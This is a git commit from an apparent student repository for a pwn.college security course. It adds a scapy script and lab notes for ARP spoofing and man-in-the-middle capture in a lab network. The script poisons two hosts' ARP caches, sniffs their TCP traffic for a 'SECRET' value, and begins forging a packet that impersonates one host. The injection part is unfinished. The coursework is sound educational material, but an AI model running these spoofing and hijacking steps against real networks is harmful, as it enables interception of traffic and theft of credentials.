my-asu-archive/CSE545_SS_Work
1
0
Fork 0
mirror of https://github.com/20kaushik02/CSE545_SS_Work.git synced 2025-12-06 10:34:07 +00:00
Code Issues Packages Projects Releases Wiki Activity

almost done with project 3

Browse Source
This commit is contained in:
Kaushik Narayan R 2024-09-23 15:00:24 -07:00
parent 0566deef79
commit 0513792a0d
2 changed files with 173 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

142
3.14/scapy_mitm_arping.py Normal file
View File

@ -0,0 +1,142 @@
import warnings
from argparse import ArgumentParser
from scapy.layers.l2 import Ether, ARP
from scapy.layers.inet import IP, TCP
from scapy.packet import Raw
from scapy.arch import get_if_addr, get_if_hwaddr
from scapy.sendrecv import srp1, sendp, sniff
WHO_HAS = 1
IS_AT = 2
MAIN_IF = "eth0"
main_if_mac = get_if_hwaddr(MAIN_IF)
main_if_ip = get_if_addr(MAIN_IF)
broadcast_mac = "ff:ff:ff:ff:ff:ff"
target_1_ip = "10.0.0.3"
target_2_ip = "10.0.0.4"
target_1_mac = ""
target_2_mac = ""
prev_load = ""
flag_mode = False
def get_target_macs():
pkt_1 = Ether() / ARP()
pkt_1[Ether].src = main_if_mac
pkt_1[Ether].dst = broadcast_mac
pkt_1[ARP].op = WHO_HAS
pkt_1[ARP].hwsrc = main_if_mac
pkt_1[ARP].hwdst = broadcast_mac
pkt_1[ARP].psrc = main_if_ip
pkt_1[ARP].pdst = target_1_ip
pkt_2 = pkt_1.copy()
pkt_2[ARP].pdst = target_2_ip
ans_1 = srp1(pkt_1, iface=MAIN_IF)
ans_2 = srp1(pkt_2, iface=MAIN_IF)
target_1_mac = ans_1[ARP].hwsrc
target_2_mac = ans_2[ARP].hwsrc
return (target_1_mac, target_2_mac)
def spoof_target(target_ip, target_mac, fake_ip):
# pretend that fake_ip is at main_if_mac
pkt = Ether() / ARP()
pkt[Ether].src = main_if_mac
pkt[Ether].dst = target_mac
pkt[ARP].op = IS_AT
pkt[ARP].hwsrc = main_if_mac
pkt[ARP].hwdst = target_mac
pkt[ARP].psrc = fake_ip
pkt[ARP].pdst = target_ip
sendp(pkt, iface=MAIN_IF)
def handle_secret(secret, port, seq, ack):
global flag_mode
if not flag_mode:
print("Secret:", secret)
return
# masquerade as target_2 and talk to target_1
global target_1_mac
global target_2_mac
global target_1_ip
global target_2_ip
pkt = Ether() / IP() / TCP()
pkt[Ether].src = target_2_mac
pkt[Ether].dst = target_1_mac
pkt[IP].src = target_2_ip
pkt[IP].dst = target_1_ip
pkt[TCP].sport = port
pkt[TCP].dport = 31337 # target_1 always listens on this port
pkt[TCP].seq = seq
pkt[TCP].ack = ack
pkt[TCP].flags = 0x02 # SYN (???)
pkt.show()
def packet_handler(pkt):
global prev_load
print(
str(pkt[IP].src) + ":" + str(pkt[TCP].sport),
">",
str(pkt[IP].dst) + ":" + str(pkt[TCP].dport),
)
raw_load = pkt[Raw].load.decode("utf-8")
secret = ""
if raw_load != prev_load:
if prev_load.startswith("SECRET"):
secret = raw_load.strip()
handle_secret(
secret, port=pkt[TCP].sport, seq=pkt[TCP].seq, ack=pkt[TCP].ack
)
prev_load = raw_load
print(raw_load, end="")
def capture_packets():
sniff(prn=packet_handler, iface=MAIN_IF, lfilter=lambda x: x.haslayer(Raw))
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument(
"-l", "--list-macs", required=False, dest="list_macs", action="store_true"
)
parser.add_argument(
"-s", "--arp-spoof", required=False, dest="arp_spoof", action="store_true"
)
parser.add_argument(
"-c", "--capture", required=False, dest="capture", action="store_true"
)
parser.add_argument(
"-i", "--infiltrate", required=False, dest="infiltrate", action="store_true"
)
args = parser.parse_args()
if args.arp_spoof and not args.list_macs:
args.list_macs = True
warnings.warn("Warning: spoofing needs MAC addresses, acquiring them first")
if args.infiltrate:
flag_mode = True
if args.list_macs:
target_1_mac, target_2_mac = get_target_macs()
print(target_1_ip + " is at " + target_1_mac)
print(target_2_ip + " is at " + target_2_mac)
if args.arp_spoof:
spoof_target(target_1_ip, target_1_mac, target_2_ip)
spoof_target(target_2_ip, target_2_mac, target_1_ip)
if args.capture:
capture_packets()

33
Dojo Notes.md
View File

@ -1,4 +1,4 @@
# CSE 545 pwn.college Dojo # CSE 545 - Fall '24 pwn.college Dojo
## Project 01 Linux Lifter ## Project 01 Linux Lifter
@ -61,7 +61,7 @@
- mangling is adding 3 then xor with 2. so just xor with 2, then subtract 3 - mangling is adding 3 then xor with 2. so just xor with 2, then subtract 3
#### lab 2a.02 ### lab 2a.02
![lab code snippet](ss2.png) ![lab code snippet](ss2.png)
@ -203,6 +203,8 @@ nc 10.0.0.142 31337
- craft Ether packet to given dest addr with type `0xFFFF` - craft Ether packet to given dest addr with type `0xFFFF`
- `srp(pkt, iface='eth0')` - `srp(pkt, iface='eth0')`
### lab 3a was chill, no notes
### .09 - IP scapy ### .09 - IP scapy
- similar - similar
@ -226,3 +228,30 @@ nc 10.0.0.142 31337
- send ACK with next syn and ack numbers - send ACK with next syn and ack numbers
### .12 - ARP scapy ### .12 - ARP scapy
- meh, arp opcode is 2
### .13 - ARP spoofing
- meh, just crafting ARP and tcpdump
### lab 3b was chill, no notes
### .14 - MiTM ARPing
- shit's getting too easy, let's not look at /challenge/run
- first, get target's macs, then arp spoof
- we don't have NET_ADMIN, so can't set ip_forward in sysctl to control MITM directly,
- first, capture packets, check raw loads
- we observe that a sequence repeats:
- 10.0.0.3:31337 sends a command: "SECRET", to 10.0.0.4 at a random port
- note: how does 3 know which port to send to?
- 4 responds with a secret, it's in ascii?
- 3 sends a list of available (?) commands - echo, flag, and then asks for a command
- 4 responds with echo, and sends "Hello, World!"
- 3 echoes it back
- connection closes, repeats with another randomized port for 4
- note that 3 sends a secret and a list of commands that includes a flag command
- craft a packet masquerading as 4, with the flag command, wait for a secret to arrive and put it in the packet
- in the time it takes 3 to do the legitimate echo from 4, we could probably send the flag command to 3 and have it processed in the same ephemeral connection
- let's try